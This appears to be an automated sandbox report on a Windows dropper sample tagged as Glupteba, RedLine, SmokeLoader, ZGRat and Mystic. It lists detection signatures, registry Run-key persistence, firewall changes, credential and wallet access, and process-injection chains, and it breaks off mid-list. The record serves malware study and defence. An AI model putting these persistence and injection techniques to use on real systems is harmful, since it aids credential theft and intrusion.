Malware Analysis Report

2024-11-13 19:10

Sample ID 231111-yvazbacb35
Target 888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8
SHA256 888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8
Tags
glupteba mystic redline smokeloader zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8

Threat Level: Known bad

The file 888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8 was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline smokeloader zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan

RedLine payload

Detect ZGRat V1

Detect Mystic stealer payload

SmokeLoader

RedLine

Mystic

ZGRat

Glupteba

Glupteba payload

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 20:05

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 20:05

Reported

2023-11-11 20:08

Platform

win10v2004-20231023-en

Max time kernel

52s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4392 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe
PID 4392 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe
PID 4392 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe
PID 3728 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe
PID 3728 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe
PID 3728 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe
PID 3844 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe
PID 3844 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe
PID 3844 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe
PID 3744 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe
PID 3744 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe
PID 3744 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe
PID 4588 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4036 wrote to memory of 3112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4036 wrote to memory of 3112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3792 wrote to memory of 3604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3792 wrote to memory of 3604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3284 wrote to memory of 5060 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3284 wrote to memory of 5060 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3588 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3588 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3588 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3588 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4404 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4404 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4404 wrote to memory of 3900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4404 wrote to memory of 3900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4460 wrote to memory of 3356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4460 wrote to memory of 3356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3872 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3872 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4588 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 3124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 3124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 5448 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe

"C:\Users\Admin\AppData\Local\Temp\888976bd4b135358f46dbe0ea105a94955014c6fbfcc3c78f127cb80535423e8.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

